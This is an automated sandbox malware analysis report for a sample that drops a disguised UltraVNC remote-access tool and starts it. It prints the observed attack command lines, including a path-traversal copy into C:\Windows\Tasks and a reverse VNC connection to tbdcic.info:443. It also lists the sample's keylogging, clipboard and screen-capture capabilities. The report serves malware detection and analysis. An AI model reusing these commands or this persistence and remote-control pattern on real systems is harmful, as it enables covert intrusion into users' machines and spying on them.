Edit tour

Windows Analysis Report
Olz7TmvkEW.exe

Overview

General Information

Sample name:	Olz7TmvkEW.exe renamed because original name is a hash value
Original sample name:	cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
Analysis ID:	1579877
MD5:	539b0fc32045de3013d00850827654aa
SHA1:	eed973e0a66dab8e80a1403acd7beab580c34f94
SHA256:	cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
Tags:	exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Yara detected UltraVNC Hacktool

AI detected suspicious sample

Contains VNC / remote desktop functionality (version string found)

Contains functionality to register a low level keyboard hook

Drops executables to the windows directory (C:\Windows) and starts them

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Suspicious UltraVNC Execution

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Process Start Locations

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Olz7TmvkEW.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\Olz7TmvkEW.exe" MD5: 539B0FC32045DE3013D00850827654AA)

cmd.exe (PID: 4596 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5344 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 424 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6120 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

Acrobat.exe (PID: 6252 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 5512 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7392 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

timeout.exe (PID: 3660 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 6120 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7188 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7932 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8084 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

sync_browser.exe (PID: 7788 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 7412 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

sync_browser.exe (PID: 8224 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 8236 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8280 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8436 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Windows\Tasks\GIjul8.QTIrrr	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Windows\Tasks\sync_browser.exe	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
0000001A.00000000.2366282795.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: Olz7TmvkEW.exe PID: 6420	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: sync_browser.exe PID: 7788	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: sync_browser.exe PID: 8224	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
26.0.sync_browser.exe.7ff7d5930000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
26.2.sync_browser.exe.7ff7d5930000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
21.2.sync_browser.exe.7ff7d5930000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
21.0.sync_browser.exe.7ff7d5930000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 424, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7788, ProcessName: sync_browser.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 424, TargetFilename: C:\Windows\Tasks\conhost.exe

Sigma detected: Suspicious UltraVNC Execution

Source: Process started

Author: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 424, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443, ProcessId: 8224, ProcessName: sync_browser.exe

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Source: Process started

Author: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 6420, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4596, ProcessName: cmd.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Olz7TmvkEW.exe", ParentImage: C:\Users\user\Desktop\Olz7TmvkEW.exe, ParentProcessId: 6420, ParentProcessName: Olz7TmvkEW.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 4596, ProcessName: cmd.exe

Sigma detected: Suspicious Process Start Locations

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 424, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7788, ProcessName: sync_browser.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.4% probability

Source: Olz7TmvkEW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: conhost.pdbUGP source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr
Source:	Binary string: conhost.pdb source: Olz7TmvkEW.exe, 00000000.00000003.2173784674.00000000026BE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe.7.dr, sdABZ4.E1924R.3.dr, sdABZ4.E1924R.0.dr

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	21_2_00007FF7D5956DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	21_2_00007FF7D5935910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	21_2_00007FF7D59EA228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	21_2_00007FF7D595C210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	26_2_00007FF7D5956DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	26_2_00007FF7D5935910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	26_2_00007FF7D59EA228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	26_2_00007FF7D595C210

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,

21_2_00007FF7D5956DD1

Source: Joe Sandbox View

ASN Name: RSHB-ASRU RSHB-ASRU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D593C0C0 _wgetenv,send,recv,send,recv,

21_2_00007FF7D593C0C0

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: tbdcic.info

Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://forum.uvnc.com
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.0000000002889000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000AC9000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://www.uvnc.com
Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.dr, GIjul8.QTIrrr.0.dr	String found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
Source: 2D85F72862B55C4EADD9E66E06947F3D.13.dr	String found in binary or memory: http://x1.i.lencr.org/

Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe

Code function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,00000000

0_2_00408630

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5931DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,

21_2_00007FF7D5931DD0

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5931DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	21_2_00007FF7D5931DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	21_2_00007FF7D59613A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5931DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	26_2_00007FF7D5931DD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59613A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	26_2_00007FF7D59613A0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5931AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,

21_2_00007FF7D5931AE0

Source: C:\Windows\Tasks\sync_browser.exe

